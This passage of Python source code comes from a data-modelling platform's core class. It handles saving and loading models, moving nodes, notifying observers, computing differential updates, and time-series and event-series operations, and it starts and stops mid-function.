f = open(os.path.join(model_directory, model_filename)+ ".model.json", "w")
f.write(json.dumps(m, indent=4))
f.close()
self.currentModelName = fileName
self.publish_status_msg(f"model {fileName} saved.")
return True
except Exception as e:
self.logger.error("problem sving "+str(e))
self.publish_status_msg(f"saving model {fileName} error")
return False
def move(self, nodeList, newParent, newIndex=None):
"""
move a list of nodes under a new parent at the child position newIndex
if the newParent is a referencer, we are creating references instead and keep the nodes where they are
Args:
nodeList [string]: a list of node descriptors of the nodes to move, a scalar is also allowed
newParent [string]: a node descriptor for the new parent under which the nodes should appear
newIndex [int]: the position in the children of newParent where the new nodes should appear
Returns:
True
"""
with self.lock:
if not type(nodeList) is list:
nodeList = [nodeList]
nodeIds = self.get_id(nodeList)
parentId = self.get_id(newParent)
if not parentId: return False
#check the special case that the parent is a referencer:
if self.model[parentId]["type"] == "referencer":
self.add_forward_refs(parentId,nodeIds)
self.logger.info("moves nodes as references "+ parentId + str(nodeIds))
return True
#for all others, we start moving nodes
self.logger.debug(f"model.move():{nodeIds}=>{parentId}")
try:
for id in nodeIds:
if id == parentId or id == "1":
self.logger.error("cant move " +id + " to " + parentId)
continue
oldParent = self.model[id]["parent"]
self.model[oldParent]["children"].remove(id) # remove the child from the old parent
self.model[id]["parent"]=parentId
if newIndex:
self.model[parentId]["children"].insert(newIndex,id) # at specific index
else:
self.model[parentId]["children"].append(id) # at the end
self.__notify_observers(oldParent, "children")
self.__notify_observers(parentId, "children")
except Exception as ex:
self.logger.error(f"problem moving {nodeIds} to new parent {parentId} this is critical, the model can be messed up {ex}")
return True
def clean_ts_entries(self):
"""
remove timeseries data that has no node, and remove nodes of type timeseries that have no timeseries data
"""
self.logger.debug("clean_ts_entries(): check consistency of model and timeseries table..")
deleteNodes = []
for id, node in self.model.items():
if node["type"] == "timeseries":
info = self.ts.get_info(id)
if "not found" in info:
self.logger.info(f" {node['name']}: has no time series date entry in the ts table, remove node")
deleteNodes.append(id)
for id in deleteNodes:
self.delete_node(id)
deleteTs=[]
for id in self.ts.get_items():
if id not in self.model:
self.logger.info(f" timeseries data {id} has no corresponding node in model .. delete the ts-data")
self.ts.delete(id)
def reset_progress_observer(self):
targetId = self.get_id("root.system.progress.targets")
if targetId:
self.remove_forward_refs(targetId)
def load(self,fileName,includeData = True, update = False):
"""
replace the current model in memory with the model from disk
please give only a name without extensions
the filename must be in ./models
Args:
fileName(string) the name of the file without extension, we also accept a dict here: a list of nodes
includeData bool: if set to false, the values for tables and files will NOT be loaded
update : if set to true, auto correct missing entries in known templates
"""
result = False
self.logger.info(f"load {fileName}, includeData {includeData}")
with self.lock:
self.publish_status_msg(f"loading model {fileName}...")
self.disable_observers()
try:
if type(fileName) is str:
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
#if os.path.dirname(fileName)
f = open(os.path.join(model_directory, model_filename) + ".model.json","r")
model = json.loads(f.read())
self.model = model
f.close()
self.currentModelName = fileName
elif type(fileName) is dict:
self.model = copy.deepcopy(fileName) # take over the nodes
self.currentModelName = "fromNodes"
#now also load the tables
self.globalIdCounter = 0 #reset the counter and recover it further down
for nodeId in self.model:
if not self.idCreationHash:
#we only recover the counter if necessary
if int(nodeId)>self.globalIdCounter:
self.globalIdCounter = int(nodeId) # here, we recover the global id counter
if includeData:
if "version" in self.model["1"] and self.model["1"]["version"]>=0.1:
#new loader
self.ts.load(os.path.join(model_directory, model_filename))
else:
self.logger.debug("time series compatibility loader")
#we assume data in file and use the standard inmemory table storage
for nodeId in self.model:
if self.get_node_info(nodeId)["type"] == "table":
table = self.get_browse_path(nodeId)
data = numpy.load(os.path.join(model_directory, model_filename) + "." + table + ".npy")
#now find the time data, apply it to all variables
timeId=self.find_table_time_node(table)
ids = self.get_leaves_ids(table+".columns")
for id, column in zip(ids, data):
if id==timeId:
times = column
else:
self.ts.create(id)
self.set_properties({"type":"timeseries"},id)
self.ts.set(id,values=column)
for id in ids:
if id == timeId:
continue
self.ts.set(id,times=times)
self.clean_ts_entries() # make sure the model and ts table is consistent
self.reset_progress_observer()
self.instantiate_all_objects()
self.reset_all_objects()
self.enable_observers()
self.publish_status_msg(f"loading model {fileName} done.")
self.model["1"]["version"]=self.version #update the version
result = True
except Exception as e:
self.logger.error("problem loading"+str(e))
self.log_error()
self.publish_status_msg(f"loading model {fileName} error.")
self.enable_observers()
result = False
if update:
self.update() # automatically adjust all widgets and other known templates to the latest style
return result
def create_differential_handle(self, user = None):
"""
make a copy of the current model and keep it as copy, create a handle for it and return that handle
this new handle is at the same time the id of the new "user", all the following requests for differential updates
will be referred to this user id
Returns:
a hash handle for the current model
"""
with self.lock:
#newHandle = str(uuid.uuid4().hex) # make a new unique handle
newHandle = str(self.diffHandleCounter)
self.diffHandleCounter += 1
if not user:
#also create a new user
user = newHandle
self.differentialHandles[newHandle]= {
"user":user,
"model":self.get_model_for_web(),
"time": int(time.time()),
"updateCounter": self.modelUpdateCounter
}# make an entry by copying the whole model
return newHandle
def get_differential_update(self,oldHandle,newHandle=None):
"""
this function takes the copy of the model (hopefully) held under oldHandle and compares it to the current model:
the differences are analyzed and returned
to avoid endless storage of old references, we have this deletion strategy: for every "user" we keep a max of
self.differentialHandlesMaxPerUser entries, if we have more, we delete the oldest
Args:
oldHandle (string): the unique id of the old version of the model
newHandle (string): the unique id of the new version to compare to, if not given, we take the current
and will automatically make a new entry for the current
Returns (dict):
containing information about the changes between and old and new version of the model
key values:
"handle":(string): the handle under which we find the new version of the model
"newNodes": (dict) nodes which are new to the tree in the form Nodeid:{properties}
"deletedNodeIds": (list) list of node ids which have been deleted
"modifiedNodes": (dict) nodes which have changed properties: if so, we give the full updated node back
"""
with self.lock:
diff={"handle":None,"newNodes":{},"deletedNodeIds":[],"modifiedNodes":{}} # the response for web
if oldHandle not in self.differentialHandles:
return None # the old handle does not exist, we can't handle this request
if newHandle is None:
# this is the standard case, we generate the new handle now
user = self.differentialHandles[oldHandle]["user"]
# we make a quick check if the model has changed at all, if not we simply return the old handle
if self.differentialHandles[oldHandle]["updateCounter"] == self.modelUpdateCounter:
self.logger.debug("get_differential_update: shortcut for no changes")
diff["handle"] = oldHandle
return diff
newHandle = self.create_differential_handle(user=user) # this function also makes a copy of the current tree and puts it in the self.differential handles list
newModel = self.differentialHandles[newHandle]["model"]
else:
if newHandle in self.differentialHandles:
newModel = self.differentialHandles[newHandle]
else:
return None # the newhandle did not exist
oldModel = self.differentialHandles[oldHandle]["model"]
# delete strategy: for every "user" we track a maximum of self.differentialHandlesMaxPerUser
users={}
for handle,entry in self.differentialHandles.items():
user = entry["user"]
if user not in users:
users[user]={}
users[ user][ handle ] = entry["time"]
for user,entries in users.items():
if len(entries)> self.differentialHandlesMaxPerUser:
#must clean up history of that user, entries is a dict of handle:time
sortedKeys =[key for key, value in sorted(entries.items(), key=lambda item: item[1])]
removeKeys = sortedKeys[:-self.differentialHandlesMaxPerUser]
self.logger.debug("remove handle"+str(removeKeys)+" of user"+user)
for key in removeKeys:
del self.differentialHandles[key]
#find the changes between the models
for newNodeId in newModel:
if newNodeId not in oldModel:
#this node is not found in the old model, so it is new
diff["newNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
else:
#this node is in both models, check if there was a change inside the nodes
#for a deep comparison, serialize them
newNodeSerialized = json.dumps(newModel[newNodeId],sort_keys=True)
oldNodeSerialized = json.dumps(oldModel[newNodeId],sort_keys=True)
if newNodeSerialized != oldNodeSerialized:
#something is different, so return that node
diff["modifiedNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
#now check for deleted ones, these appear in the old but not in the new
diff["deletedNodeIds"]=list(set(oldModel.keys())-set(newModel.keys()))
diff["handle"]=newHandle
return diff
def publish_status_msg(self, event):
"""
send out an event e.g. for status information
the event to send looks like
event = { "id": 1123,
"event": "system.status",
"data": {"nodeId": xx, "value": .., "function": ...}
}
Args
event [string or dict]
"""
self.logger.debug(f"publish_status_msg ({event})")
self.modelUpdateCounter += 1
if type(event) is str:
#make sure the formatting is json compatible
event = event.replace("'",'"')# ' => "
event={"event":"system.status","data":{"text":event}}
event["id"]=self.modelUpdateCounter
for observerObject in self.observers:
observerObject.update(event)
def publish_event(self,event,desc=None,info=None):
"""
send an event out
Args
event [str] the event string
desc the node descriptor
info [dict] additional fields to send out
"""
self.logger.debug(f"publish_event {event} : {desc}, {info}")
data = {}
if desc:
id = self.get_id(desc)
if not id: return
data["id"] = id
data["browsePath"] = self.get_browse_path(id)
if info:
    data.update(info)
event = {"event":event,"data":data}
for observerObject in self.observers:
observerObject.update(event)
def disable_observers(self):
self.lock_model()
#with self.lock:
self.disableObserverCounter += 1
#self.logger.debug(f"disable_observers() {self.disableObserverCounter}")
def enable_observers(self):
self.release_model()
if self.disableObserverCounter >0:
self.disableObserverCounter -=1
else:
self.logger.error("enable_observers without disable observers")
#self.logger.debug(f"enable_observers() {self.disableObserverCounter}")
def notify_observers(self, nodeIds, properties, eventInfo={}):
"""
public wrapper for __notify_observers, for expert use only!
"""
#self.logger.info(f"notify observses(), {str_lim(nodeIds,50)}, {properties}")
return self.__notify_observers(nodeIds,properties,eventInfo)
def get_referencers(self,descList,deepLevel = 0):
"""
get the referencers to this node via back-traversing the leaves algorithm
we look for parents through deepLevel levels and from there on we look back for referencers
deepLevel is the number of extra parent levels: 1 means one extra level, 2 means two extra levels
Returns:
a list of referencers ids that point to the given descList nodes
"""
#convert all to nodes to ids
if type(descList) is not list:
descList = [descList]
startList = set([self.__get_id(node) for node in descList])
startList =set([node for node in startList if node]) #remove None and duplicates
referencers = set() #we collect the parents here and avoid duplicates
#in this first iteration we take the referencers pointing directly to the nodes or their parents
workList = startList.copy()
for level in range(deepLevel+1):
#from this level we take the backrefs
for id in workList:
referencers.update(self.model[id]["backRefs"])
#prepare parents for next round
parents=set()
for id in workList:
myParent=self.model[id]["parent"]
if myParent not in ["0","1"]: #root
parents.update([myParent]) #!use list to avoid break into chars
#now take the parents as currentList
workList = parents.copy()
if not workList:
break #avoid turning cycles for nothing
#second step:
# now we take all final referencers and all referencers to those referencers with no limit
# (go back the leaves algorithm)
collectedReferencers = referencers.copy() # we take all we have so far
while True:
workList=set()
for id in referencers:
workList.update(self.model[id]["backRefs"])
collectedReferencers.update(workList)
if not workList:
break
else:
#one more round
referencers = workList.copy()
return list(collectedReferencers)
def __notify_observers(self, nodeIds, properties, eventInfo={} ):
"""
this function is called internally when nodes or properties have changed. Then, we look if any
observer has to be triggered
we also increase the counter and time on the root.observers.modelObserver
Args:
nodeIds: the node id or list of node ids where a change occurred
properties: the property or list of properties of the node that has changed
"""
#exception for the progress node
if type(properties) is not list:
properties = [properties]
if type(nodeIds) is not list:
nodeIds = [nodeIds]
if self.disableObserverCounter>0:
#only one exception: progress works always
mustReturn = True
with self.lock:
for nodeId in nodeIds:
if self.model[nodeId]["name"] == "progress":
mustReturn = False
break
if mustReturn:
#self.logger.info(f"__notify_observers disable return {nodeIds} {properties}")
return
with self.lock:
# this is for the tree updates, any change is taken
self.modelUpdateCounter = self.modelUpdateCounter + 1 #this is used by the diff update function and model copies
collectedEvents=[]
enableTree = self.get_node("root.system.enableTreeUpdateEvents")
if enableTree and enableTree.get_value()==False:
pass
else:
# Notify all observers about the tree update, this is a standard
event = {
"id": self.modelUpdateCounter,
"event": "tree.update",
"data": ""}
collectedEvents.append(event) # send later
names =[self.model[id]["name"] for id in nodeIds]
self.logger.debug(f"__notify_observers {len(nodeIds)} ids:{str_lim(names,100)}: {properties}")
triggeredObservers=[] # we use this to suppress multiple triggers of the same observer, the list holds the observerIds to be triggered
#p=utils.Profiling("__notify.iterate_nodes")
referencers = self.get_referencers(nodeIds,deepLevel=5)#deeplevel 5: nodes can be organized by the user in a hierarchy
nodeId = self.__get_id(nodeIds[0])#take the first for the event string,
#p.lap(f"get refs for {nodeId}")
self.logger.debug(f"__notify on {len(referencers)} referencers: {str_lim([self.get_browse_path(id) for id in referencers],200)}")
for id in referencers:
if self.model[id]["name"] == "targets" and self.model[self.model[id]["parent"]]["type"] == "observer":
# this referencers is an observer,
observerId = self.model[id]["parent"]
observer = self.get_children_dict(observerId)
# check if trigger
if observer["enabled"]["value"] == True:
#self.logger.debug(f"{self.model[nodeId]['name']} is targeted by observer {self.get_browse_path(observerId)}")
if observerId in triggeredObservers:
self.logger.debug(f"we have triggered the observer {self.get_browse_path(observerId)} in this call already, pass")
continue
#self.logger.debug(f"check properties to triggered the observer {self.get_browse_path(observerId)}")
#check if any of the observed properties matches
propertyMatch = False
for property in properties:
if property in observer["properties"]["value"]:
propertyMatch=True
break
if not propertyMatch:
#self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} no property match ")
pass
else:
self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} for change in {property}")
self.model[observer["triggerCounter"]["id"]]["value"] = self.model[observer["triggerCounter"]["id"]]["value"]+1
self.model[observer["lastTriggerTime"]["id"]]["value"] = datetime.datetime.now().isoformat()
for funcNodeId in self.get_leaves_ids(observer["onTriggerFunction"]["id"]):
self.logger.debug(f"execute ontrigger function {funcNodeId}")
self.execute_function(funcNodeId)
if "triggerSourceId" in observer:
self.model[observer["triggerSourceId"]["id"]]["value"] = nodeId
if observer["hasEvent"]["value"] == True:
#self.logger.debug(f"send event {observer['eventString']['value']}")
#also send the real event
#self.modelUpdateCounter = self.modelUpdateCounter+1
event = {
"id": self.modelUpdateCounter,
"event": observer["eventString"]["value"],
"data": {"nodeId":observerId,"sourceId":nodeId,"sourcePath":self.get_browse_path(nodeId)}}
#we directly put some changed properties in the event
if self.model[nodeId]["type"] not in ["column","file","timeseries"]:
event["data"]["value"]=self.model[nodeId]["value"]
for prop in properties:
if prop in ["children","forwardRefs"]:
event["data"][prop]=self.model[nodeId][prop]
#some special handling
try:
if event["event"] == "system.progress":
progressNode = self.get_node(self.get_leaves_ids("root.system.progress.targets")[0])
event["data"]["value"] = progressNode.get_value()
event["data"]["function"] = progressNode.get_parent().get_parent().get_browse_path()
else:
eventNode = self.get_node(observerId)
extraInfoNode = eventNode.get_child("eventData")
if extraInfoNode:
extraInfo = extraInfoNode.get_value()
if type(extraInfo) is not dict:
extraInfo={"info":extraInfo}
event["data"].update(extraInfo)
if eventInfo:
event["data"]["_eventInfo"]=eventInfo #put this only if we have info
except Exception as ex:
self.logger.error(f"error getting extra info for event {ex}, {sys.exc_info()[0]}")
#for all other events, take the event data if there is one (as json)
self.logger.debug(f"generate event {event}")
collectedEvents.append(event)
triggeredObservers.append(observerId)# next time, we don't trigger
#p.lap("complete backrefs {nodeId}, {backrefs}")
#self.logger.debug(p)
#self.logger.debug("now send the events")
#event = copy.deepcopy(event)
for event in collectedEvents:
for observerObject in self.observers:
observerObject.update(event)
self.logger.debug(f"done sending {len(collectedEvents)} events")
def create_observer(self):
# Instantiate a new observer
observer = Observer(self)
# attach it to the model
self.attach_observer(observer)
# return the observer
return observer
def attach_observer(self, observer):
# Add a new observer
self.logger.debug(f"Adding new observer: {id(observer)}")
with self.lock:
self.observers.append(observer)
def detach_observer(self, observer):
with self.lock:
try:
self.observers.remove(observer)
self.logger.debug(f"Removing observer: {id(observer)}")
except ValueError:
self.logger.exception("Trying to remove an observer which doesn't exist in the list of observers.")
def set_column_len(self,nodeDescriptor,newLen):
"""
adjust the length of a column, extensions are nan-padded
Args: nodeDescriptor: the node
newLen (int): the new length of the column
Returns:
the new value set or none if problem
"""
with self.lock:
id = self.get_id(nodeDescriptor)
if not id: return None
if self.model[id]["type"] != "column":
self.logger.error("set_column_len: not a column")
return None
#now make the adjustments
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = numpy.full(newLen, numpy.nan)
else:
#is already an array
if len(self.model[id]['value']) == newLen:
#nothing to do
pass
if len(self.model[id]['value']) > newLen:
self.model[id]['value'] = self.model[id]['value'][0:newLen]
elif len(self.model[id]['value']) < newLen:
self.model[id]['value'] = numpy.append(self.model[id]['value'], numpy.full(newLen-len(self.model[id]['value']), numpy.nan))
else:
#same len
pass
return newLen
def get_upload_folder_files(self, matchFilter=None, blackList = []):
"""
Args:
matchFilter: a string that must be contained in the file names to deliver
blackList: a list of filenames which should not be delivered
Returns list of files with absolute file names, list of files with fileNames
"""
full_path = os.path.realpath(__file__) # returns a string representing the canonical path, argument file is a file system path
path, filename = os.path.split(full_path)
folder = path+r'\upload'
absFileNames = []
foundFileNames = []
#now iterate the uploaded files
fileNames = os.listdir(folder)
for idx,fileName in enumerate(fileNames):
if matchFilter:
if matchFilter not in fileName:
continue # this file will be ignored
if fileName in blackList:
continue
foundFileNames.append(fileName)
absFileNames = [folder+"\\"+fileName for fileName in foundFileNames]
return foundFileNames,absFileNames
def get_upload_folder_path(self):
full_path = os.path.realpath(__file__) # returns a string representing the canonical path, argument file is a file system path
path, filename = os.path.split(full_path)
folder = path + r'\upload'
return folder
def update(self):
"""
update all known widgets to the latest template including complex backward compatibility changes
:return:
"""
self.logger.info("update() running...")
self.disable_observers()
try:
# the ts widgets:
# now go through the widgets and update all according to the template
# now find all nodes of type widget
newNodes = {}
helperModel = Model()
helperModel.disable_observers()
helperModel.create_template_from_path("root.widget", self.get_templates()['templates.timeseriesWidget'])
widgets = []
for id, props in self.model.items():
if props["type"] == "widget":
widgetObject = self.get_node(id)
if widgetObject.get_child("widgetType").get_value() == "timeSeriesWidget":
widgets.append(id)
self.logger.debug(f"update():found widget {widgetObject.get_browse_path()}")
for id in widgets:
path = self.get_browse_path(id)
mirrorBefore = self.get_branch_pretty(path)
self.create_template_from_path(path,self.get_templates()['templates.timeseriesWidget']) # this will create all nodes which are not there yet
# now make specific updates e.g. linking of referencers, update of list to dicts etc.
# if colors is a list: make a dict out of it
colors = self.get_value(f"{id}.hasAnnotation.colors")
tags = self.get_value(f"{id}.hasAnnotation.tags")
if type(colors) is list:
colors = {v:{"color":colors[idx],"pattern":None} for idx,v in enumerate(tags)}
self.logger.debug(f"update(): set value{id}.hasAnnotation.colors := {colors} ")
self.set_value(f"{id}.hasAnnotation.colors",colors)
if not "visibleTags" in mirrorBefore["hasAnnotation"] or (self.get_value(f"{id}.hasAnnotation.visibleTags") != mirrorBefore["hasAnnotation"]["visibleTags"][".properties"]["value"]):
#it is different or new, so we created it now
visibleTags = {tag:True for tag in tags}
#make sure that from the colors, we take them as well
updateVisibleTags = {tag:True for tag in colors}
visibleTags.update(updateVisibleTags)
self.set_value(f"{id}.hasAnnotation.visibleTags",visibleTags)
self.logger.debug(f"update(): set value{id}.visibleTagss := {visibleTags} ")
#make sure the hasAnnotation.annotations referencer points to newannotations as well
self.add_forward_refs(f"{id}.hasAnnotation.annotations",[f"{id}.hasAnnotation.newAnnotations"],allowDuplicates=False)
#now make sure the observers have at least the required properties enabled
widget = self.get_node(id)
helperRoot = helperModel.get_node("root.widget")
template = self.get_templates()['templates.timeseriesWidget']
children = helperRoot.get_children(3)
print(f"2 level children {[node.get_browse_path() for node in children]}")
for child in helperRoot.get_children():
if child.get_properties()["type"] == "observer":
widgetNode = widget.get_child(child.get_name()).get_child("properties")
helperNode = child.get_child("properties")
for prop in helperNode.get_value():
current = widgetNode.get_value()
if prop not in current:
current.append(prop)
widgetNode.set_value(current)
for child in helperRoot.get_children(3):
if child.get_properties()["type"] == "referencer":
self.logger.debug(f"found referencer {child.get_name()}")
# now adjust the references of new nodes and of the ones that were there
targets = child.get_properties()["forwardRefs"]
if targets:
targets = [helperModel.get_browse_path(ref) for ref in targets]
requiredTargets = [widget.get_browse_path()+"."+".".join(ref.split(".")[2:]) for ref in targets]
self.logger.debug(f"required targets {requiredTargets}")
#now check in the model
widgetNodePath = widget.get_browse_path()+ child.get_browse_path()[len(helperRoot.get_browse_path()):]
widgetNode = self.get_node(widgetNodePath)
#now check if we have them
targetPaths = [tNode.get_browse_path() for tNode in widgetNode.get_targets()]
for target in requiredTargets:
if target not in targetPaths:
self.logger.debug(f"adding ref {widgetNode.get_browse_path()} => {target}")
self.add_forward_refs(widgetNode.get_id(),[target])
#now the system progress observer
if not self.get_node("root.system.progress"):
self.create_template_from_path("root.system.progress",self.get_templates()['system.observer'])
self.set_value("root.system.progress.hasEvent",True)
self.set_value("root.system.progress.eventString","system.progress")
self.set_value("root.system.progress.properties",["value"])
self.set_value("root.system.progress.enabled",True)
except Exception as ex:
self.logger.error(f" {ex} , {sys.exc_info()[0]}")
helperModel.delete()
helperModel.delete()
self.enable_observers()
# ########################################
# time series api
def time_series_create(self,desc,allocSize = None):
id = self.get_id(desc)
return self.ts.create(id,allocSize = allocSize)
def time_series_delete(self,desc):
id = self.get_id(desc)
return self.ts.delete(id)
def time_series_insert(self, desc, values=None, times=None, allowDuplicates = False):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.insert(id,values, times,allowDuplicates=allowDuplicates)
self.__notify_observers(id, "value")
return result
def time_series_append(self, desc, values=None, times=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.append(id,values, times)
self.__notify_observers(id, "value")
return result
def time_series_delete_area(self,desc,start=None,end=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.delete_area(id,start=start,end=end)
self.__notify_observers(id, "value")
return result
def time_series_merge(self, desc, values = None, times = None):
id = self.get_id(desc)
if not id in self.model:
return False
return self.ts.merge(id,values=values,times=times)
def time_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
if self.lock:
result = self.ts.set(id,values=values,times=times)
self.__notify_observers(id, "value")
return result
def time_series_get_table(self,
variables,
tableDescriptor = None,
start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None,
copy=True,
includeAllNan=False):
"""
get a time series table from variables (nodes of type "timeseries").
Args:
variables [list of node descriptors]: nodes to be part of the data table requested (ordered!)
tableDescriptor : a descriptor for the table where the variables reside
possible addressing of the requested nodes:
1) ids or browsepaths of nodes (no tableDescriptor needed)
2) names of nodes and tableDescriptor of the table (names must be unique in the columns of the table)
start, end [float]:
the start and endtime of the table given as seconds since epoch
we also allow the special case of endTime = 0 and startTime = -interval
we also allow the special case of startTime given and end time= 0
noBins(int): the number of samples to be returned inside the table between start end endtime,
if None is given, we return all samples (rows) we have in the table and do not aggregate
includeIntervalLimits [bool]: if set to true, we will include one more data point each left and right of the requested time
format: [enum] "default", "flat", see return description
includeAllNan: if set to true, we will return all nan in the data even if they don't match the resampling
we can also give a list of nodes for which we want the nans
resampleMethod [enum]:
how to resample if we need to; options are:
None (if not specified): sample and hold
"linear": linear interpolation
"linearfill": linear interpolation and also interpolate "nan" or "inf" values in the original data
toList: (bool) True: return data as python list, False: return numpy arrays
examples:
- get all data of the variables
data = m.time_series_get_table(["root.mytable.variables.a","root.mytable.variables.b"]) # get all data
- request max 300 values of data (this is what the UI does)
data = m.time_series_get_table(["a","b"],"root.mytable",start=1581483065.323,end=1581483080.323,noBins=300,includeIntervalLimits=True)
- request data and resample to equidistant 25 sec spacing, also fill possible nan values with interpolation
times = list(range(1581483065,1581483065+100,25))
data = m.time_series_get_table(["a","b"],"root.mytable",resampleTimes = times,resampleMethod = "linearfill")
Returns(dict)
formatting depends on the "format" option
"defaut": return the result as {"var_a":{"values":[],"__time":[]}, "var_b":{"values":[],"__time":[]..}
"flat" return the result as {"var_a":[], "var_a__time":[],"var_b":[],"var_b__time":[]....}
the variable descriptor are the ones given in the request
"__time" : list of timestamps for the returned table in epoch seconds as float64
"values": the list of float values of one of the requested variables
"""
if tableDescriptor:
tableId = self.get_id(tableDescriptor)
tableVars = self.get_leaves(tableId+".columns")
else:
tableId = None
if type(start) is str:
start = date2secs(start)
if type(end) is str:
end = date2secs(end)
with self.lock:
#first check if all requested timeseries exist and have type time series
#vars = [] #self.get_id(variables)
if not type(variables) is list:
variables= [variables]
varIds = {} # NodeId: request descriptor
for var in variables:
varId = self.get_id(var)
if not varId:
#try to find per columns and table desc
found = False
if tableId:
for tableVar in tableVars:
if tableVar["name"] == var:
varId = tableVar["id"]
found = True
break
if not found:
self.logger.error(f"requested variable {var} does not exist")
return False
if self.model[varId]["type"]!="timeseries":
self.logger.error(f"requested variable {var} not timeseries, instead {self.model[varId]['type']}")
return False
varIds[varId]=var #remember it for later
if type(includeAllNan) is list:
#convert to ids
includeAllNan = self.get_id(includeAllNan)
table = self.ts.get_table(list(varIds.keys()), start=start, end=end, copy=copy, resampleTimes=resampleTimes, noBins = noBins, includeIntervalLimits=includeIntervalLimits,resampleMethod=resampleMethod,includeAllNan=includeAllNan)
#now map the result keys back to the descriptors used in the query: if it was a browsepath, we return a browsepath, if it was an id, we return an id
# make some formatting
def convert(input,toList=toList):
if toList:
return list(input)
else:
return input
result = {}
for k,v in table.items():
if format=="flat":
result[varIds[k]]=convert(v["values"])
result[varIds[k]+"__time"]=convert(v["__time"])
else:
result[varIds[k]] = {"values":convert(v["values"]),"__time":convert(v["__time"])}
#if len(variables) == 1:
# #we only have one variable, so we return without descriptor
# result = result[list(result.keys())[0]]
return result
def time_series_get_info(self,name=None):
return self.ts.get_info(name)
def time_series_get_raw(self,desc,start=None,end=None):
"""
gets the time series as they are internally
Returns:
{"values":[2,2,3,3]., "__time":[1,k22,3,34,45]
"""
id = self.get_id(desc)
if not id:
return None
table = self.ts.get_table([id], start=start, end=end, copy=False, resampleTimes=None,
noBins=None, includeIntervalLimits=False,
resampleMethod=None)
result = table[id]
return result
def time_series_insert_blobs(self, tableDesc, blobs=[]):
""" blob is a dict or list of dicts of key and values containing one time base like
the descriptors of the variables can be ids, browsepaths or just names (without dots)
if the descriptors are names, we try to find them in the model, they must exist there uniquely, otherwise
they can't be processed
we also autocreate the table or missing variables
the data will be put in a table:
- we try to find the table based on one of the variables, if not found, we create the table
{
"a": [1.5,1.6,1.7]m
"b": [2,3,4]
"__time" :[100001,100002,100003]
}
"""
if not type(blobs) is list:
blobs=[blobs]
#first, find the table
with self.lock:
tableId = self.get_id(tableDesc)
if not tableId:
#try to find the table from the first node
#table not found, create it
tableId = self.create_node_from_path(tableDesc,properties={"type":"table"})
if tableId:
columnsId = self.create_node(parent=tableId, name="columns", properties={"type": "referencer"})
variablesId = self.create_node(parent=tableId, name="variables", properties={"type": "folder"})
else:
self.logger.error(f"cant create table {tableDesc}")
return False
else:
columnsId = self.get_child(tableId,"columns")
variablesId = self.get_child(tableId, "variables")
#now we know the tableId, columnsId, variablesId
# iterate over all blobs and find the ids of the names in the blobs, if not found, create it
# exchange the descriptors to ids
desc2Id = {} # key: the descriptor from the input blob v: the id in the model
tableVars = self.get_leaves(columnsId)
desc2Id = {dic["name"]:dic["id"] for dic in tableVars} # key: the descriptor from the input blob v: the id in the model, preload with the names
#convert all to ids
newBlobs=[]
idsInBlobs=[]
for blob in blobs:
newBlob={}
for k,v in blob.items():
if k=="__time":
newBlob[k]=v
else:
#does this id already exist?
if k in desc2Id:
id = desc2Id[k]
else:
id = None
#try to find
for var in tableVars:
if var["name"] == k:
id = v["id"]
break
if not id:
#still not found, we need to create it
id = self.create_node(parent=variablesId,name=k,properties={"type": "timeseries"})
if not id:
self.logger.error(f"cant find or create {name}")
continue
else:
self.add_forward_refs(columnsId,[id])
desc2Id[k]=id #remember to speed up next time
newBlob[id] = v
idsInBlobs.append(id)
newBlobs.append(newBlob)
self.logger.debug(f"inserting blobs {len(newBlobs)}")
self.__notify_observers(idsInBlobs, "value")
result = self.ts.insert_blobs(newBlobs)
return result
# ########################################
# event series api
def event_series_create(self,desc,map={}):
id = self.get_id(desc)
if "eventMap" in self.model[id]:
self.model[id]["eventMap"].update(map)
else:
self.model[id]["eventMap"]=map.copy()
return self.ts.create(id)
def event_series_get_new_number_entry(self,id):
eventMap = self.model[id]["eventMap"]
numbers = [v for k, v in eventMap.items()]
newNumber = max(numbers)+1
while newNumber in numbers:
newNumber = newNumber+1
return newNumber
def event_series_get_event_number(self, desc, event, autoCreate=True):
id = self.get_id(desc)
if not id:
return None
with self.lock:
eventMap = self.model[id]["eventMap"] # a dict like {"starting":1, "machineStop":2,...}
if type(event) in [str,numpy.str_]:
if event not in [k for k,v in eventMap.items()]:
if not autoCreate:
return None
# we must put a new eventString
if eventMap == {}:
newEventNumber = 1
else:
newEventNumber = self.event_series_get_new_number_entry(id)
self.model[id]["eventMap"][event] = newEventNumber
return newEventNumber
else:
#is a known event string, get the number
return eventMap[event]
else:
#this is a number already, check if it is in the map
eventNumbers = [v for k,v in eventMap.items()]
if event in eventNumbers:
return event
else:
if not autoCreate:
return None
#must create a new entry
try:
#to make sure we have only numbers there
newEventString = "event_"+str(int(event))
self.model[id]["eventMap"][newEventString]=int(event)
except:
self.log_error()
return None
return event
def event_series_insert(self, desc, values=None, times=None, allowEventDuplicates = False):
"""
Args:
values: list of events, where the event is either an eventString or an event number
if values is a scalar, we assume that for all times the same event will be inserted
allowEventDuplicates: setting this to true allows the same event to appear multiple times at the same time stamp
different events are always allowed at the same time
"""
id = self.get_id(desc)
if not id in self.model:
return None
if type(values)==type(None) or type(times)==type(None):
return None
if not(type(values) is list or type(values) is numpy.ndarray):
values = [values]*len(times)
#convert the values to numbers and create new map entry if needed
numbers = numpy.asarray([self.event_series_get_event_number(id,event) for event in values],dtype=numpy.int)
#convert the times to epoch if not already done
epochs = numpy.asarray([t if type(t) is not str else date2secs(t) for t in times ],dtype=numpy.float64)
if not allowEventDuplicates:
# we must delete the events which exist already at the same time with the same event
